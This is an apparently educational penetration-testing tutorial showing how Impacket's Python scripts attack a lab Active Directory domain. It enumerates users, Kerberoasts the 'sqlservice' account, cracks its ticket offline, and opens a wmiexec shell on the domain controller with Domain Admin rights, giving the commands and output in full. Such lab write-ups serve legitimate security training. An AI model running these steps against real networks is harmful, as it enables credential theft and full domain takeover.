- Python for network penetration testing: Hacking Windows domain controllers with impacket Python tools
- What is impacket?
- What Windows protocols and domain controllers can Impacket exploit?
- Installation:
- Attacking AD Environments using Impacket:
- AD User Enumeration:
- Using python for Privilege Escalation:
- What is Kerberoasting?
- Requesting a TGS:
- Gaining shell as a Domain Administrator:
- Conclusion
- Sources
Python for network penetration testing: Hacking Windows domain controllers with impacket Python tools
Impacket is one of the most popular tools available for Network Penetration testing. This toolset is a great example of the power of python in network penetration testing. This article explains how Impacket can be used to perform some interesting network based attacks in an Active Directory environment.
What is impacket?
According to the official page of Impacket by SecureAuth, “Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.
Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library”.
Impacket library comes with a collection of python scripts that are extremely useful in various different scenarios for security professionals. In this article, we will specifically explore some of the Impacket tools that are helpful in attacking Domain Controllers in Active Directory environments.
What Windows protocols and domain controllers can Impacket exploit?
As shown in the official web page of Impacket, the following protocols are featured in Impacket.
- Ethernet, Linux “Cooked” capture.
- IP, TCP, UDP, ICMP, IGMP, ARP.
- IPv4 and IPv6 Support.
- NMB and SMB1, SMB2 and SMB3 (high-level implementations).
- MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.
- Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.
- Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, DCOM, WMI
- Portions of TDS (MSSQL) and LDAP protocol implementations.
Protocols such as WMI and DCOM are extremely useful in lateral movement in an AD environment. In the next few sections of the article, let us discuss how Impacket can be used against Domain Controllers to abuse some of the protocols listed here.
Installation:
Impacket can be downloaded from the official GitHub page of SecureAuthCorp and run using a python interpreter. According to the GitHub page, Python 2.6/2.7 and Python 3.7 the versions that are known to work.
In this case, we will set up Impackt using Docker on Kali Linux, which is running as a virtual machine.
Note: Docker must be installed before attempting to build the image.
First, clone the source code using git as shown in the following excerpt and navigate to the impacket directory.
ChangeLog Dockerfile examples impacket LICENSE MANIFEST.in README.md requirements.txt setup.py tests tox.ini
As we can notice, there is a Dockerfile. Run the following command, to build the docker image using the Dockerfile available.
$ docker build -t impacket:latest . |
As we can notice, the image is named impacket and tagged latest . Following is the output of the preceding command.
Sending build context to Docker daemon 14.7MB
Step 1/12 : FROM python:2-alpine as compile
2-alpine: Pulling from library/python
aad63a933944: Pull complete
259d822268fb: Pull complete
10ba96d218d3: Pull complete
44ba9f6a4209: Pull complete
Status: Downloaded newer image for python:2-alpine
Removing intermediate container 6fd58d64ac4a
Step 9/12 : FROM python:2-alpine
Step 10/12 : COPY –from=compile /opt/venv /opt/venv
Step 11/12 : ENV PATH=”/opt/venv/bin:$PATH”
Removing intermediate container 240721305da2
Step 12/12 : ENTRYPOINT [“/bin/sh”]
Removing intermediate container 053e56eb9132
Successfully built 54731856b89e
Once the image is built, we can verify if the image is successfully built using the following command.
REPOSITORY TAG IMAGE ID CREATED SIZE
impacket latest 54731856b89e About a minute ago 155MB
After the image is built, impackt can be used by spinning up a new container. The following command can be used to spin up a new container and it gives a shell on the container by default.
On the container shell, we can type any impacket script name and hit tab for suggestions as shown in the following excerpt.
GetADUsers.py GetADUsers.pyc GetNPUsers.py GetNPUsers.pyc GetUserSPNs.py GetUserSPNs.pyc
With this, the Impacket setup is complete and we are ready to use it.
Attacking AD Environments using Impacket:
Assuming that we have already gained foothold in the network with low privileged domain user credentials, let us understand how we can use some of the scripts from Impacket to perform attacks against Active Directory environments.
Following is the environment we are using to demonstrate the concepts.
Low privileged user credentials: bob:p@ssw0rD
AD User Enumeration:
Enumerating Active Directory users, groups, computers and their relationships is a crucial step in attacking AD environments. Let us use the script GetADUsers.py to dump the full list of users available in the target domain. The following command can be used to retrieve AD users.
/ # GetADUsers.py -dc-ip 192.168.235.134 ADLAB.local/bob:p@ssw0rD |
Since our attacking machine is not part of the domain, we will need to explicitly specify the domain controller IP address using -dc-ip flag as shown in the preceding command.
This command however will not return any users as an email id filter is used in the script by default and there are no email ids available in our target environment. This can be seen by runnin the preceding command with the option -debug .
/ # GetADUsers.py -dc-ip 192.168.235.134 ADLAB.local/bob:p@ssw0rD -debug |
This command will return an empty user list with the details of the filter used as follows.
[+] Search Filter=(&(sAMAccountName=*)(mail=*)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))) |
To override this default behaviour we can use -all flag and it will return all the users available in the domain. The command looks as follows.
/ # GetADUsers.py -dc-ip 192.168.235.134 ADLAB.local/bob:p@ssw0rD -debug -all |
The output looks as follows.
Administrator 2020-10-27 03:05:53.839096
krbtgt 2020-10-27 03:15:54.552696
bob 2020-10-27 03:21:17.773021
tom 2020-10-27 03:24:08.129552
admin 2020-10-27 03:25:06.129524
sqlservice 2020-12-15 14:49:04.366695
Since this is a lab setup, there are very few records setup. In a real environment, this list will be much longer. Additionally, we can also notice that the filter used this time is (&(sAMAccountName=*)(objectCategory=user)).
Using python for Privilege Escalation:
Now, let us use another python script available in Impacket library to elevate our privileges from domain user to a domain administrator. To achieve this, we are going to use a technique called Kerberoasting, which will be explained shortly. Note that the success of this attack relies on a few other factors, which we will discuss shortly.
First, let us identify all the accounts in the domain with Service Principal Name (SPN) set. This can be done using the following command.
/ # GetUserSPNs.py -dc-ip 192.168.235.134 ADLAB.local/bob:p@ssw0rD |
Running this command shows the list of service accounts as follows.
As we can notice, we got a service account named sqlservice .
What is Kerberoasting?
In an Active Directory domain environment, any authenticated domain user without administrative privileges can request service tickets (TGS) for service accounts by specifying their SPN values. In response to this request, Active Directory will return a ticket, which is encrypted using the NTLM hash of the account associated with that SPN. Once the ticket is obtained, offline cracking can be performed using tools like Hashcat to recover the service account password in plain text. If the cracked service accounts are misconfigured to have unlimited privileges such as Domain Administrator, an attacker can become a Domain Admin just by compromising these service accounts. Let us see an example of how this can be achieved using impacket’s GetUsersSPNs.py .
Requesting a TGS:
The following command can be used to request a TGS for the service account sqlservice.
/ # GetUserSPNs.py -request -dc-ip 192.168.235.134 ADLAB.local/sqlservice |
The output contains an encrypted ticket which looks as follows.
We can copy this into a file named hashes.txt and run hashcat against it using a wordlist as shown below.
As we can notice in the preceding excerpt, the service account password is cracked.
Gaining shell as a Domain Administrator:
As a next step, one can use Impacket’s wmiexec.py to gain shell access on the Domain Controller remotely. To do this, the following command can be used.
/ # wmiexec.py -debug sqlservice:p\@ssw0rD@192.168.235.134 |
As we can notice, we are using the service account credentials that we compromised earlier. If successful, we should see a remote shell on the Domain Controller as shown in the following excerpt.
Impacket v0.9.23.dev1+20201209.133255.ac30770 – Copyright 2020 SecureAuth Corporation
[+] Impacket Library Installation Path: /opt/venv/lib/python2.7/site-packages/impacket [+] Target system is 192.168.235.134 and isFDQN is False [+] StringBinding chosen: ncacn_ip_tcp:192.168.235.134[49666] [!] Launching semi-interactive shell – Careful what you execute [!] Press help for extra shell commandsWe can verify our privileges using the following commands.
Country/region code 000 (System Default)
Password last set 12/15/2020 6:49:04 AM
Password changeable 12/16/2020 6:49:04 AM
User may change password Yes
Last logon 12/15/2020 7:26:16 AM
Global Group memberships *Domain Admins *Domain Users
The command completed successfully.
As we can observe in the preceding excerpt, we have logged into the Domain Controller using Domain Admin rights.
Conclusion
In this article, we discussed how powerful python is to perform network penetration testing. To avoid reinventing the wheel by writing our own script, we made use of a powerful framework called Impacket to demonstrate the power of Python for network penetration testing. Clearly, Python can be used to create almost any popular network protocol as demonstrated in Impacket.